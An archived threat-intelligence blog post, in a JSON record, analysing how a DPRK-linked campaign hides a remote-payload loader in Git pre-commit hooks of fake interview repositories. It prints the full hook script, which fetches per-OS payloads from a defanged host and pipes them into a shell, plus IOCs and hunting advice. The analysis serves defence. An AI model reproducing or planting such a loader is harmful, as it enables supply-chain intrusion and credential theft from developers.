{
	"id": "555200a1-e25b-4658-a024-3b1498d79c0c",
	"created_at": "2026-05-07T02:43:11.129017Z",
	"updated_at": "2026-05-07T02:44:10.984388Z",
	"deleted_at": null,
	"sha1_hash": "de0c52145ad53f6236c980ebee12b0b8427104ca",
	"title": "Lazarus Group Uses Git Hooks To Hide Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 341875,
	"plain_text": "Lazarus Group Uses Git Hooks To Hide Malware\r\nBy OpenSourceMalware.com\r\nPublished: 2026-05-06 · Archived: 2026-05-07 02:23:59 UTC\r\nThe OpenSourceMalware team has spotted a fresh twist in the DPRK's Contagious Interview / TaskJacker\r\nplaybook: the operators have pivoted away from stuffing their stage-2 loader into .vscode/tasks.json ,\r\npackage.json postinstall scripts, or fake .woff2 font files, and are now hiding it inside Git hooks. The\r\ncandidate clones the \"coding assessment\" repo, and the loader fires before the commit object is even written.\r\nWhat the hook actually does\r\nThe malicious .githooks/pre-commit script is short, which is the whole point — it's a thin loader that\r\nfingerprints the OS via uname -s , then curls or wgets a per-platform payload from precommit.vercel.app and\r\npipes it straight into a shell or cmd.exe :\r\n#!/bin/sh\r\nuname_s=\"$(uname -s 2\u003e/dev/null || echo unknown)\"\r\ncase \"$uname_s\" in\r\n Darwin)\r\n curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n Linux)\r\nhttps://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nPage 1 of 4\n\nwget -qO- 'hxxps://precommit[.]vercel.app/settings/linux?flag=5' | sh \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n MINGW*|MSYS*|CYGWIN*)\r\n curl -s hxxps://precommit[.]vercel.app/settings/windows?flag=5 | cmd \u003e/dev/null 2\u003e\u00261\r\n exit 0\r\n ;;\r\n *)\r\n exit 0\r\n ;;\r\nesac\r\nA few things stand out. In typical DPRK fashion the C2 endpoint serves a different shell script per OS, so the\r\noperator can ship a Bash payload to macOS/Linux victims and a cmd.exe -compatible batch payload to anyone\r\non Git Bash / MSYS / Cygwin on Windows. The flag=5 query param is almost certainly a campaign/variant\r\nidentifier — we've seen Contagious Interview operators use similar numeric flags across earlier sub-campaigns to\r\ntrack which lure delivered the click. Output is silently discarded with \u003e/dev/null 2\u003e\u00261 , and the script always\r\nexit 0 s so the commit succeeds and nothing looks broken to the developer.\r\nThe hostname precommit[.]vercel.app is the social-engineering layer. To anyone glancing at it, it reads like the\r\nofficial pre-commit framework's marketing site. It is not. It's a free Vercel deployment standing up a per-path\r\npayload server that the operators can spin up and tear down at will.\r\nWhy pre-commit hooks?\r\nPre-commit hooks are an almost ideal stage-2 trigger for this campaign:\r\nThey're already part of the legitimate developer workflow — Husky, lint-staged, and pre-commit\r\nframework configs are everywhere, so a .githooks/ directory raises zero suspicion.\r\nThey run automatically the first time the candidate tries to \"fix the bug and commit\" — which is literally\r\nthe task the fake recruiter assigned them.\r\nMost candidates who clone an interview repo will configure hooks via git config core.hooksPath\r\n.githooks (or have it set in a setup script) without reading what's inside.\r\nThey sidestep VS Code entirely. Microsoft has finally started taking the tasks.json auto-execute\r\nproblem seriously, and operators are clearly looking for the next dev-tool footgun.\r\nIt's the same Contagious Interview social engineering — fake recruiter, \"coding assessment\" repo, multi-stage\r\nloader pulling InvisibleFerret-style implants for crypto wallet and credential theft — just delivered through a\r\ndifferent live wire.\r\nWhat we're seeing\r\nAcross the sample we pulled today, the same pre-commit hook (identical content, identical SHA 3ebd9bb… ) was\r\ncommitted to several GitHub repositories that follow the standard Contagious Interview lure pattern: defi/crypto-token themed projects, freshly-created accounts, minimal commit history, and a \"task\" that requires the candidate\r\nhttps://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nPage 2 of 4\n\nto actually run code locally. You can reproduce the hunt yourself with this GitHub code search: path:**/pre-commit OR path:**/post-checkout content:\"vercel.app\" . Additionally, the same threat actor group is using\r\npost-checkout hooks, which are even nastier s they will fire off any time you change branches.\r\nIf you're a developer being asked to clone a repo as part of an interview process — especially one in the crypto,\r\nDeFi, or web3 space — assume it's hostile until proven otherwise. Inspect .githooks/ , .husky/ ,\r\n.vscode/tasks.json , and any postinstall script before doing anything else. Better yet, run the whole thing\r\ninside a disposable VM with no browser profile, no ~/.ssh , and no wallet mounted.\r\nIndicators of Compromise (IOCs)\r\nC2 Infrastructure\r\nhxxps://precommit[.]vercel.app/settings/mac?flag=5\r\nhxxps://precommit[.]vercel.app/settings/linux?flag=5\r\nhxxps://precommit[.]vercel.app/settings/windows?flag=5\r\nprecommit[.]vercel.app\r\nFile Indicators\r\n.githooks/pre-commit\r\nSHA-256 of observed loader: 3ebd9bb57d155cc7c3353660f54c153a094cdfbd (git blob SHA, multiple repos)\r\nHunt Query (GitHub code search)\r\npath:**/pre-commit OR path:**/post-checkout content:\"vercel.app\"\r\nConclusion\r\nThis is the same DPRK actor, the same victim profile, the same end goal — they've just moved the trip-wire one\r\nstep earlier in the developer workflow. Expect the loader location to keep mutating: anywhere a developer's\r\ntooling runs an arbitrary script automatically, Contagious Interview will eventually hide a payload there.\r\nIf you encounter similar repos or pre-commit hooks reaching out to suspicious infrastructure, please report them to\r\nOpenSourceMalware.com.\r\nStay safe out there.\r\nTags: #dprk #contagious-interview #taskjacker #lazarus #supply-chain #github\r\nhttps://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nPage 3 of 4\n\nSource: https://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nhttps://opensourcemalware.com/blog/dprk-git-hooks-malware\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://opensourcemalware.com/blog/dprk-git-hooks-malware"
	],
	"report_names": [
		"dprk-git-hooks-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1778121791,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.pdf",
		"text": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.txt",
		"img": "https://archive.orkl.eu/de0c52145ad53f6236c980ebee12b0b8427104ca.jpg"
	}
}